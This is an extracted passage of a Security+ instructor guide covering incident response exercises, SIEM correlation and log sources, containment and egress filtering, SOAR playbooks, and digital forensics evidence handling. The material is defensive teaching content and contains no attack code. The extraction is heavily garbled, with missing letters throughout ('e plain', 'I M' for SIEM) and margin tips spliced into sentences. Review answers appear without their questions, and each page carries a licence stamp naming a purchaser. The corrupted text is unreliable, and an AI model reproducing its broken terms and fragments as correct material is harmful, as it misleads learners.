• Tabletop—this is the least costly type of training. The facilitator presents a scenario
and the responders e plain what action they would take to identify, contain, and
eradicate the threat. The training does not use computer systems. The scenario data
is presented as ashcards.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
462 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• imulations a simulation is a team based e ercise, where the red team attempts
an intrusion, the blue team operates response and recovery controls, and a
white team moderates and evaluates the e ercise. This type of training re uires
considerable investment and planning.
embers of entucky and Alabama ational and Air Guard participating in a simulated network
attack exercise. (Image 01 entucky ational Guard.)
IT E have published a white paper that discusses preparing and facilitating incident
response exercises (mitre.org sites default files publications pr 1 - -cyber-exercise-
playbook.pdf).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 463
• Business continuity plan (BCP) this identifies how business processes should
deal with both minor and disaster level disruption. During an incident, a system
may need to be isolated. Continuity planning ensures that there is processing
redundancy supporting the work ow, so that when a server is taken o ine for
security remediation, processing can failover to a separate system. If systems do not
have this sort of planned resilience, incident response will be much more disruptive.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
464 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Incident Response Procedures
Answer the following questions:
1. What are the six phases of the incident response life cycle?
False—security alerts should be sent to those able to deal with them at a given level of
security awareness and on a need-to-know basis.
The response team needs a secure channel to communicate over without alerting
the threat actor. There may also be availability issues with the main communication
network, if it has been a ected by the incident.
A simulation e ercise creates an actual intrusion scenario, with a red team performing
the intrusion and a blue team attempting to identify, contain, and eradicate it.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 465
Topic 17B
Utilize Appropriate Data Sources
or Incident esponse
It is wise to provide for confidential reporting so that employees are not afraid to
report insider threats, such as fraud or misconduct. It may also be necessary to use an
"out-of-band" method of communication so as not to alert the intruder that his or her
attack has been detected.
First Responder
When a suspicious event is detected, it is critical that the appropriate person on
the CI T be notified so that they can take charge of the situation and formulate the
appropriate response. This person is referred to as the first responder. This means
that employees at all levels of the organization must be trained to recognize and
respond appropriately to actual or suspected security incidents. A good level of security
awareness across the whole organization will reduce the incidence of false positives
and negatives. For the most serious incidents, the entire CIRT may be involved in
formulating an e ective response.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
466 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Correlation
The I M can then run correlation rules on indicators e tracted from the data sources
to detect events that should be investigated as potential incidents. ou can also filter or
query the data based on the type of incident that has been reported.
Correlation means interpreting the relationship between individual data points to
diagnose incidents of significance to the security team. A I M correlation rule is a
statement that matches certain conditions. These rules use logical e pressions, such as
AND and , and operators, such as == (matches), < (less than), > (greater than), and
in contains . or e ample, a single user logon failure is not a condition that should
raise an alert. Multiple user logon failures for the same account, taking place within
the space of one hour, is more likely to require investigation and is a candidate for
detection by a correlation rule.
Error.LogonFailure > 3 AND LogonFailure.User AND
Duration < 1 hour
As well as correlation between indicators observed on the network, a SIEM is likely to
be configured with a threat intelligence feed. This means that data points observed on
the network can be associated with known threat actor indicators, such as IP addresses
and domain names. AI-assisted analysis enables more sophisticated alerting and
detection of anomalous behavior.
Retention
A I M can enact a retention policy so that historical log and network traffic data is kept
for a defined period. This allows for retrospective incident and threat hunting, and can
be a valuable source of forensic evidence.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 467
The SGUI console in Security Onion. A SIE can generate huge numbers of alerts
that need to be manually assessed for priority and investigation.
(Screenshot courtesy of Security Onion securityonion.net.)
• Alarm the event is automatically classified as critical and a priority alarm is raised.
This might mean emailing an incident handler or sending a te t message.
Sensors
A sensor is a network tap or port mirror that performs packet capture and intrusion
detection. One of the key uses of a SIEM is to aggregate data from multiple sensors and
log sources, but it might also be appropriate to configure dashboards that show output
from a single sensor or source host.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
468 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• tatistical deviation analysis can show when a data point should be treated as
suspicious. or e ample, a cluster graph might show activity by standard users and
privileged users, invoking analysis of behavioral metrics of what processes each type
runs, which systems they access, and so on. A data point that appears outside the
two clusters for standard and administrative users might indicate some suspicious
activity by that account.
C (tools.ietf.org html rfc ) ad usts the structure slightly to split the tag into app
name, process I , and message I fields, and to make them part of the header.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 469
• yslog ng uses a di erent configuration file synta , but can also use TC secure
communications and more advanced options for message filtering.
journalctl
In Linu , te t based log files of the sort managed by syslog can be viewed using
commands such as cat, tail, and head. Most modern Linu distributions now
use systemd to initialize the system and to start and manage background services.
ather than writing events to syslog format te t files, logs from processes managed
by systemd are written to a binary format file called ournald. vents captured by
ournald can be forwarded to syslog. To view events in ournald directly, you can use
the journalctl command to print the entire ournal log, or you can issue various
options with the command to filter the log in a variety of ways, such as matching a
service name or only printing messages matching the specified severity level.
NXlog
NXlog (n log.co) is an open-source log normalization tool. One principal use for it is
to collect Windows logs, which use an XML-based format, and normalize them to a
syslog format.
Log file data is a critical resource for investigating security incidents. As well as the Network, OS, and
log format, you must also consider the range of sources for log files and know how to ecurity Log iles
determine what type of log file will best support any given investigation scenario.
Teaching
stem and ecurit o s Tip
Emphasize that relying
One source of security information is the event log from each network server or client.
on the default logging
ystems such as Microsoft indows, Apple mac , and Linu keep a variety of logs to options is unlikely to
record events as users and software interact with the system. The format of the logs be sufficient. Audit
varies depending on the system. Information contained within the logs also varies by logs in particular
system, and in many cases, the type of information that is captured can be configured. require careful tuning
to provide an e ective
When events are generated, they are placed into log categories. These categories audit trail and enforce
describe the general nature of the events or what areas of the they a ect. The five accountability and
main categories of Windows event logs are: non-repudiation.
We do mention it
• Application—events generated by applications and services, such as when a service elsewhere, but you
cannot start. may want to remind
students that sysmon
• ecurity audit events, such as a failed logon or access to a file being denied. is very widely used
for Windows security
• System—events generated by the operating system and its services, such as storage logging (github.com/
volume health checks. SwiftOnSecurity/
sysmon config).
• Setup—events generated during the installation of Windows.
• Forwarded Events—events that are sent to the local log from other hosts.
Network Logs
Network logs are generated by appliances such as routers, firewalls, switches, and
access points. Log files will record the operation and status of the appliance itself the
system log for the appliance plus traffic and access logs recording network behavior,
such as a host trying to use a port that is blocked by the firewall, or an endpoint trying
to use multiple MAC addresses when connected to a switch.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
470 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Authentication Logs
Authentication attempts for each host are likely to be written to the security log. You
might also need to inspect logs from the servers authori ing logons, such as ADI
and TACAC servers or indows Active Directory AD servers.
e TT Access o s
eb servers are typically configured to log TT traffic that encounters an error or
traffic that matches some predefined rule set. Most web servers use the common log
format CL or C e tended log file format to record the relevant information.
The status code of a response can reveal quite a bit about both the request and the
server's behavior. Codes in the 400 range indicate client-based errors, while codes in
the range indicate server based errors. or e ample, repeated orbidden
responses may indicate that the server is re ecting a client's attempts to access
resources they are not authori ed to. A ad ateway response could indicate
that communications between the target server and its upstream server are being
blocked, or that the upstream server is down.
In addition to status codes, some web server software also logs HTTP header
information for both requests and responses. This can provide you with a better
picture of the makeup of each request or response, such as cookie information and
MIM types. Another header field of note is the ser Agent field, which identifies
the type of application making the request. In most cases, this is the version of the
browser that the client is using to access a site, as well as the client's operating system.
However, this can be misleading, as even a browser like Microsoft Edge includes
versions of Google Chrome and Safari in its User-Agent string. Therefore, the User-
Agent field may not be a reliable indicator of the client's environment.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 471
Dump Files
System memory contains volatile data. A system memory dump creates an image
file that can be analy ed to identify the processes that are running, the contents of
temporary file systems, registry data, network connections, cryptographic keys, and
more. It can also be a means of accessing data that is encrypted when stored on a
mass storage device.
File
ile metadata is stored as attributes. The file system tracks when a file was created,
accessed, and modified. A file might be assigned a security attribute, such as marking
it as read only or as a hidden or system file. The ACL attached to a file showing its
permissions represents another type of attribute. inally, the file may have e tended
attributes recording an author, copyright information, or tags for inde ing searching. In
Linu , the ls command can be used to report file system metadata.
Web
When a client requests a resource from a web server, the server returns the resource
plus headers setting or describing its properties. Also, the client can include headers
in its request. One key use of headers is to transmit authorization information, in
the form of cookies. eaders describing the type of data returned te t or binary, for
instance) can also be of interest. The contents of headers can be inspected using the
standard tools built into web browsers. Header information may also be logged by a
web server.
Email
An email's Internet header contains address information for the recipient and sender,
plus details of the servers handling transmission of the message between them. When
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
472 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
an email is created, the mail user agent (MUA) creates an initial header and forwards
the message to a mail delivery agent MDA . The MDA should perform checks that the
sender is authorized to issue messages from the domain. Assuming the email isn't
being delivered locally at the same domain, the MDA adds or amends its own header
and then transmits the message to a message transfer agent (MTA). The MTA routes
the message to the recipient, with the message passing via one or more additional
MTAs, such as SMTP servers operated by ISPs or mail security gateways. Each MTA
adds information to the header.
eaders aren't e posed to the user by most email applications, which is why they're
usually not a factor in an average user's udgment. ou can view and copy headers
from a mail client via a message properties/options/source command. MTAs can add
a lot of information in each received header, such as the results of spam checking. If
you use a plainte t editor to view the header, it can be difficult to identify where each
part begins and ends. Fortunately, there are plenty of tools available to parse headers
and display them in a more structured format. ne e ample is the Message Analy er
tool, available as part of the Microsoft Remote Connectivity Analyzer (testconnectivity.
microsoft.com tests o ). This will lay out the hops that the message took more
clearly and break out the headers added by each MTA.
Mobile
Mobile phone metadata comprises call detail records CD s of incoming, outgoing,
and attempted calls and M te t time, duration, and the opposite party's number.
Metadata will also record data transfer volumes. The location history of the device
can be tracked by the list of cell towers it has used to connect to the network. If you
are investigating a suspected insider attack, this metadata could prove a suspect's
whereabouts. Furthermore, AI-enabled analysis (or patient investigation) can
correlate the opposite party numbers to businesses and individuals through other
public records.
CD s are generated and stored by the mobile operator. The retention period for CD s
is determined by national and state laws, but is typically around months. CD s are
directly available for corporate-owned devices, where you can request them from the
communications provider as the owner of the device. Metadata for personally owned
devices would only normally be accessible by law enforcement agencies by subpoena
or with the consent of the account holder. An employment contract might require an
employee to give this consent for bring your own device D mobiles used within
the workplace.
Metadata such as current location and time is also added to media such as photos and
videos, though this is true for all types of computing device. hen these files are uploaded
to social media sites, they can reveal more information than the uploader intended.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 473
will provide the ability to pivot from the event or alert summary to the underlying
packets. Detailed analysis of the packet contents can help to reveal the tools used in an
attack. It is also possible to e tract binary files such as potential malware for analysis.
et o I I
A ow collector is a means of recording metadata and statistics about network traffic
rather than recording each frame. Network traffic and ow data may come from a wide
variety of sources or probes , such as switches, routers, firewalls, web pro ies, and so
forth. Flow analysis tools can provide features such as:
• ighlighting of trends and patterns in traffic generated by particular applications,
hosts, and ports.
• Visualization tools that enable you to quickly create a map of network connections
and interpret patterns of traffic and ow data.
sFlow
sFlow, developed by HP and subsequently adopted as a web standard (tools.ietf.org/
html/rfc3176 , uses sampling to measure traffic statistics at any layer of the I model
for a wider range of protocol types than the I based Net ow. s low can also capture
the entire packet header for samples.
Bandwidth Monitor
Bandwidth usage can be a key indicator of suspicious behavior, if you have reliable
baselines for comparison. ne pected bandwidth consumption could be evidence
of a data e filtration attack, for instance. andwidth usage can be reported by ow
collectors. Firewalls and web security gateways are also likely to support bandwidth
monitoring and alerting.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
474 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Appropriate Data Sources for
Incident esponse
Answer the following questions:
alse the first responder would be the member of the CI T to handle the report.
You need to deploy a sensor to send network packet captures or intrusion detection
alerts to the SIEM.
3. Which software tool is most appropriate for forwarding Windows event logs
to a Syslog-compatible server?
403 Forbidden is an HTTP status code, so most likely a web server. Another possibility
is a web pro y or gateway.
5. What type of data source(s) would you look for evidence of a suspicious
TA in
A Message Transfer Agent (MTA) is an SMTP server. You might inspect an SMTP log or
the Internet header metadata of an email message.
low records are generated by Net low or I low Information port I I probes.
A ow record is data that matches a ow record, which is a particular combination of
keys (IP endpoints and protocol/port types).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 475
Topic 17C
Apply Mitigation Controls
As incidents cover such a wide range of di erent scenarios, technologies, motivations, Incident Containment
and degrees of seriousness, there is no standard approach to containment or incident
isolation. ome of the many comple issues facing the CI T are Teaching
• hat damage or theft has occurred already ow much more could be in icted and Tip
in what sort of time frame (loss control)? Note that containment
strategies can be
• What countermeasures are available? What are their costs and implications? in uenced by the need
to preserve forensic
• What actions could alert the attacker to the fact that the attack has been detected? evidence.
What evidence of the attack must be gathered and preserved?
hen an incident has been identified, classified, and prioriti ed, the ne t phase of
incident response is containment. Containment techniques can be classed as either
isolation-based or segmentation-based.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
476 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Applications that you suspect may be the vector of an attack can be much less e ective
to the attacker if the application is prevented from e ecuting on most hosts.
Segmentation-Based Containment
Segmentation-based containment is a means of achieving the isolation of a host
or group of hosts using network technologies and architecture. Segmentation uses
LANs, routing subnets, and firewall ACLs to prevent a host or group of hosts from
communicating outside the protected segment. As opposed to completely isolating the
hosts, you might configure the protected segment as a sinkhole or honeynet and allow
the attacker to continue to receive filtered and possibly modified output over the
C&C channel to deceive him or her into thinking the attack is progressing successfully.
Analysis of the malware code by reverse engineering it could provide powerful
deception capabilities. You could intercept the function calls made by malware to allow
the adversary to believe an attack is proceeding while building detailed knowledge of
their tactics and (hopefully) identity. Attribution of the attack to a particular group will
allow an estimation of adversary capability.
If reinstalling from baseline template configurations or images, make sure that there is
nothing in the baseline that allowed the incident to occur If so, update the template before
rolling it out again.
2. Reaudit security controls—ensure they are not vulnerable to another attack. This
could be the same attack or from some new attack that the attacker could launch
through information they have gained about your network.
If your organization is sub ected to a targeted attack, be aware that one incident may be
very uickly followed by another.
3. nsure that a ected parties are notified and provided with the means to
remediate their own systems. or e ample, if customers' passwords are stolen,
they should be advised to change the credentials for any other accounts where
that password might have been used not good practice, but most people do it .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 477
change may mean the deployment of a new type of security control, or altering the
settings of an e isting control to make it more e ective.
istorically, many organi ations focused on ingress filtering rules, designed to
prevent local network penetration from the Internet. In the current threat landscape,
it is imperative to also apply strict egress filtering rules to prevent malware that has
infected internal hosts by other means from communicating out to C&C servers. Egress
filtering can be problematic in terms of interrupting authori ed network activity, but it
is an essential component of modern network defense. Some general guidelines for
configuring egress filtering are
• Allow only authorized application ports and, if possible, restrict the destination
addresses to authorized Internet hosts. Where authorized hosts cannot be
identified or a default deny is too restrictive, use L and content filtering to try to
detect malicious traffic over authori ed protocols.
• Block access to "known bad" IP address ranges, as listed on don't route or peer
D filter lists.
• Block access from any IP address space that is not authorized for use on your
local network.
• Block all Internet access from host subnets that do not need to connect to the
Internet, such as most types of internal server, workstations used to manage
industrial control systems (ICSs), and so on.
Even within these rules, there is a lot of scope for threat actors to perform command
signaling and e filtration. or e ample, cloud services, such as content delivery
networks and social media platforms, can be used to communicate scripts and
malware commands and to e filtrate data over TT rhinosecuritylabs.com/aws/
hiding-cloudcobalt-strike-beacon-c2-using-amazon-apis .
The limitations of a basic packet filtering firewall even if it is stateful mean that some Content Filter
sort of content filtering application pro y may provide better security. These types of Configuration Changes
appliances are usually referred to as secure web gateways (SWGs). A SWG mediates
user access to Internet services, with the ability to block content from regularly
updated URL/domain/IP blacklists and perform intrusion detection/prevention on
traffic based on matching content in application layer protocol headers and payloads.
If a SWG is already in place, an attacker may have found a way to circumvent it via
some sort of backdoor. The network configuration should be checked and updated
to ensure that all client access to the Internet must pass through the SWG. Another
possibility is that the attacker is using a protocol or C C method that is not filtered.
The SWG should be updated with scripts and data, domains and IP addresses, that will
block the e ploit.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
478 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
pdate or e o e Certificates
Compromise of the private key represented by a digital certificate or the ability to
present spoofed certificates as trusted is a critical security vulnerability as it allows an
attacker to impersonate trusted resources and potentially gain unauthorized access to
secure systems.
• emove compromised root certificates if an attacker has managed to install a
root certificate, the attacker can make malicious hosts and services seem trusted.
uspicious root certificates must be removed from the client's cache.
• ulnerabilities if the malware e ploited a software fault, either install the patch or
isolate the system until a patch can be developed.
• Lack of security controls—if the attack could have been prevented by endpoint
protection A , host firewall, content filtering, DL , or MDM, investigate the
possibility of deploying them to the endpoint. If this is not practical, isolate the
system from being e ploited by the same vector.
• eak configuration if the configuration was correctly applied, but was e ploited
anyway, review the template to devise more secure settings. Make sure the
template is applied to similar hosts.
• A block list or deny list generally allows e ecution, but e plicitly prohibits listed
processes.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 479
You will need to update the contents of allow lists and block lists in response to
incidents and as a result of ongoing threat hunting and monitoring. Threat hunting
may also provoke a strategic change. or e ample, if you rely principally on e plicit
denies, but your systems are sub ect to numerous intrusions, you will have to consider
adopting a "least privileges" model and using a deny-unless-listed approach. This sort
of change has the potential to be highly disruptive however, so it must be preceded by
a risk assessment and business impact analysis.
ecution control can also be tricky to configure e ectively, with many opportunities
for threat actors to evade the controls. Detailed analysis of the attack might show the
need for changes to the e isting mechanism, or the use of a more robust system.
Quarantine
If mitigating techniques are not successful, or the results are uncertain, the endpoint
will require careful management before being integrated back onto the network. If
further evidence needs to be gathered, the best approach may be to quarantine or
sandbo the endpoint or suspect process file. This allows for analysis of the attack or
tool and collection of evidence using digital forensic techniques.
Automation is the action of scripting a single activity, while orchestration is the action of Security Orchestration,
coordinating multiple automations and possibly manual activity to perform a comple , Automation, and
multistep task. In the case of security orchestration, automation, and response Response
(SOAR), this task is principally incident response, though the technologies can also be
used for tasks such as threat hunting too. SOAR is designed as a solution to the problem
of the volume of alerts overwhelming analysts' ability to respond, measured as the
mean time to respond (MTTR). A SOAR may be implemented as a standalone technology
or integrated with a I M often referred to as a ne t gen I M. The basis of A
is to scan the organization's store of security and threat intelligence, analyze it using
machine/deep learning techniques, and then use that data to automate and provide data
enrichment for the work ows that drive incident response and threat hunting. It can also
assist with provisioning tasks, such as creating and deleting user accounts, making shares
available, or launching Ms from templates, to try to eliminate configuration errors. The
A will use technologies such as cloud and DN D A Is, orchestration tools, and
cyberthreat intelligence CTI feeds to integrate the di erent systems that it is managing.
It will also leverage technologies such as automated malware signature creation and user
and entity behavior analytics A to detect threats.
An incident response work ow is usually defined as a playbook. A playbook is a
checklist of actions to perform to detect and respond to a specific type of incident. A
playbook should be made highly specific by including the uery strings and signatures
that will detect a particular type of incident. A playbook will also account for compliance
factors, such as whether an incident must be reported as a breach plus when and
to whom notification must be made. here a playbook is implemented with a high
degree of automation from a SOAR system, it can be referred to as a runbook, though
the terms are also widely used interchangeably. The aim of a runbook is to automate
as many stages of the playbook as possible, leaving clearly defined interaction points
for human analysis. These interaction points should try to present all the conte tual
information and guidance needed for the analyst to make a quick, informed decision
about the best way to proceed with incident mitigation.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
480 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A icrosoft presentation at lack at illustrates some of the techni ues that can be used
to mitigate adversarial AI (i.blackhat.com us-1 Thu-August- us-1 -Parikh-Protecting-the-
Protector- ardening- achine- earning- efenses-Against-Adversarial-Attacks.pdf).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 481
Review Activity:
Mitigation Controls
Answer the following questions:
This task is suited to data loss prevention DL , which can block the transfer of tagged
content over unauthorized channels.
4. A threat actor gained access to a remote network over a VPN. Later, you
disco er oota e o the user o the hac ed account ein co ertl filmed
while typing their password. What type of endpoint security solution might
have prevented this breach?
A mobile device management MDM suite can prevent use of the camera function of a
smartphone.
6. You are investigating a client workstation that has not obtained updates to
its endpoint protection software for days. On the workstation you discover
thousands o e ecuta le files ith random names The local endpoint lo
re eals that all o them ha e een scanned and identified as mal are ou
can find no e idence o an urther intrusion on the net or hat is the
likely motive of the threat actor?
This could be an o ine tainted data attack against the endpoint software's
identification engine.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
482 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 17
Summary
Teaching ou should be able e plain the process and procedures involved in e ective incident
Tip response and implement strategies to remediate intrusion events.
Check that students
are confident about
the content that has
Guidelines for Performing Incident Response
been covered. If there
Follow these guidelines for developing or improving incident response policies and
is time, revisit any
content e amples that procedures:
they have questions • Identify goals for implementing structured incident response, following the
about. If you have
used all the available preparation, identification, containment, eradication, recovery, and lessons
time for this lesson learned steps.
block, note the issues,
and schedule time for • repare for e ective incident response by creating a CI T C T C I T with suitable
a review later in the communications resources and policies.
course.
• Develop an incident classification system and prepare I s and playbooks for
Interaction distinct incident scenarios, using attack frameworks kill chain, Diamond Model, and
Opportunity MITRE ATT&CK) to facilitate analysis.
Use this as an
opportunity for • Consider whether implementing SOAR and automated runbooks could provide
students to share more e ective response, taking care to protect AI backed systems from tainted
their real-world training data attacks.
e periences with
security incidents. You • Configure I M or syslog to aggregate appropriate data sources and develop
may also encourage
correlation rules display alerts, status indicators, and trend analysis via dashboards:
them to brainstorm
appropriate responses
• ost log file data sources network, system, security, vulnerability scan output .
to hypothetical
scenarios. Consider
• Application log file data sources DN , web, oI .
recording the
incidents and
• Network packet and intrusion detection data.
responses for
review, and present
• Network traffic and protocol ow statistics.
additional content
to see if students
• Integrate incident response containment, eradication, and recovery processes
would want to change
the responses they with procedures for forensic evidence collection, disaster recovery, and business
provided. continuity.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 18
Explaining Digital Forensics
Lesson Objectives
In this lesson, you will:
• plain key aspects of digital forensics documentation.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
484 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 18A
Explain Key Aspects of Digital
orensics ocumentation
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 485
Legal Hold
Legal hold refers to the fact that information that may be relevant to a court case
must be preserved. Information sub ect to legal hold might be defined by regulators
or industry best practice, or there may be a litigation notice from law enforcement or
lawyers pursuing a civil action. This means that computer systems may be taken as
evidence, with all the obvious disruption to a network that entails.
Chain of Custody
Chain of custody documentation reinforces the integrity and proper handling of
evidence from collection, to analysis, to storage, and finally to presentation. hen
security breaches go to trial, the chain of custody protects an organi ation against
accusations that evidence has either been tampered with or is di erent than it was
when it was collected. very person in the chain who handles evidence must log the
methods and tools they used.
A digital forensics report summari es the significant contents of the digital data and the Digital Forensics
conclusions from the investigator's analysis. It is important to note that strong ethical Reports
principles must guide forensics analysis.
• Analysis must be performed without bias. Conclusions and opinions should be
formed only from the direct evidence under analysis.
• Analysis methods must be repeatable by third parties with access to the same
evidence.
Defense counsel may try to use any deviation of good ethical and professional behavior
to have the forensics investigator's findings dismissed.
• earch allow investigators to locate files of interest to the case. As well as keyword
search, software might support semantic search. emantic search matches
keywords if they correspond to a particular conte t.
• Tags apply standardi ed keywords or labels to files and metadata to help organi e
the evidence. Tags might be used to indicate relevancy to the case or part of the
case or to show confidentiality, for instance.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
486 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• ecurity at all points evidence must be shown to have been stored, transmitted,
and analy ed without tampering.
• Disclosure an important part of trial procedure is that the same evidence be made
available to both plainti and defendant. discovery can fulfill this re uirement.
ecent court cases have re uired parties to a court case to provide searchable I
rather than paper records.
emember that if the matter comes to trial, the trial could take place months or years after
the event. It is vital to record impressions and actions in notes. Also consider that in-place
CCT systems or webcams might have captured valuable evidence.
If possible, evidence is gathered from the live system using forensic software tools. It is
vital that these tools do as little to modify the digital data that they capture as possible.
As well as digital evidence, an investigator should interview witnesses to establish
what they were doing at the scene, whether they observed any suspicious behavior or
activity, and also to gather information about the computer system. An investigator
might ask questions informally and record the answers as notes to gain an initial
understanding of the circumstances surrounding an incident. An investigator must
ask uestions carefully, to ensure that the witness is giving reliable information and
to avoid leading the witness to a particular conclusion. Making an audio or video
recording of witness statements produces a more reliable record but may make
witnesses less willing to make a statement. If a witness needs to be compelled to make
a statement, there will be legal issues around employment contracts if the witness is
an employee and right to legal representation.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 487
Digital evidence is not ust drawn from analysis of host system memory and data Event Logs and
drives. An investigation may also obtain the event logs for one or more network Network Traffic
appliances and or server hosts. imilarly, network packet captures and traces ows
might provide valuable evidence. n a typical network, sensor and logging systems are
not configured to record all network traffic, as this would generate a very considerable
amount of data. n the other hand, an organi ation with sufficient IT resources could
choose to preserve a huge amount of data. A etrospective Network Analysis NA
solution provides the means to record network events at either a packet header or
payload level.
or forensics, data records that are not supported by physical evidence a data drive
must meet many tests to be admissible in court. or event logs, the drives might not
be accessible or might no longer hold the original logs for network traffic, there is no
physical evidence. here logs and network traffic are captured in a I M, the I M
should demonstrate accuracy that all relevant data was captured and integrity that
neither party could have tampered with the data .
In some cases, an organization may conduct a forensics investigation without the trategic
e pectation of legal action. As well as being used in a legal process, forensics has a Intelligence and
role to play in cybersecurity. It enables the detection of past intrusions or ongoing but Counterintelligence
unknown intrusions by close e amination of available digital evidence. A famous uote
attributed to former Cisco C John Chambers illustrates the point There are two
types of companies those that have been hacked, and those who don't know they have
been hacked.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
488 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Digital forensics can be used for information gathering to protect against espionage
and hacking. This intelligence is deployed in two di erent ways
• Counterintelligence identification and analysis of specific adversary tactics,
techni ues, and procedures TT provides information about how to configure
and audit active logging systems so that they are most likely to capture evidence of
attempted and successful intrusions.
• trategic intelligence data and research that has been analy ed to produce
actionable insights. These insights are used to inform risk management and security
control provisioning to build mature cybersecurity capabilities.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 489
Review Activity:
igital orensics ocumentation
Answer the following questions:
The evidence cannot be seen directly but must be interpreted so the validity of the
interpreting process must be un uestionable.
The time stamp may record the niversal Coordinated Time rather than the local time.
An o set would need to be applied and it might need to be demonstrated that the
computer's time one was correctly set .
It's important to uphold a record of how evidence is handled in a chain of custody. The
chain of custody will help verify that everyone who handled the evidence is accounted
for, including when the evidence was in each person's custody. This is an important
tool in validating the evidence's integrity.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
490 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 18B
Explain Key Aspects of Digital Forensics
E idence Ac uisition
3. Data on persistent mass storage devices DDs, Ds, and ash memory devices
• artition and file system blocks, slack space, and free space.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 491
The indows registry is mostly stored on disk, but there are keys notably
ardware that only ever exist in memory. The contents of the registry can be analyzed via
a memory dump.
Digital forensics software is designed to assist the acquisition, documentation, and Digital Forensics
analysis of digital evidence. Most of the commercial forensics tools are available for the oftware
indows platform only.
• nCase orensic is a digital forensics case management product created by
uidance oftware guidancesoftware.com encase forensic cmpid nav r . Case
management is assisted by built in pathways, or work ow templates, showing the
key steps in diverse types investigation. In addition to the core forensics suite, there
are separate products for e discovery digital evidence management and ndpoint
Investigator for over the network analysis of corporate desktops and servers .
• The Sleuth Kit (sleuthkit.org is an open source collection of command line tools ystem Memory
and programming libraries for disk imaging and file analysis. Autopsy is a graphical Acquisition
front end for these tools and acts as a case management work ow tool. The
program can be e tended with plug ins for various analysis functions. Autopsy is Teaching
available for indows and can be compiled from the source code to run on Linu . Tip
Remind students
• WinHex from ays ways.net winhe is a commercial tool for forensic recovery that there is no
and analysis of binary data, with support for a range of file systems and memory physical evidence
dump types depending on version . to validate a system
memory image, so
• The olatility ramework github.com volatilityfoundation volatility is widely used the provenance of the
for system memory analysis. capture can only be
established by video
recording the process.
System Memory Acquisition Note that one of the
functions of EDR
ystem memory is volatile data held in andom Access Memory AM modules. is to perform live
olatile means that the data is lost when power is removed. A system memory memory capture when
suspicious activity is
dump creates an image file that can be analy ed to identify the processes that are detected (carbonblack.
running, the contents of temporary file systems, registry data, network connections, com blog using
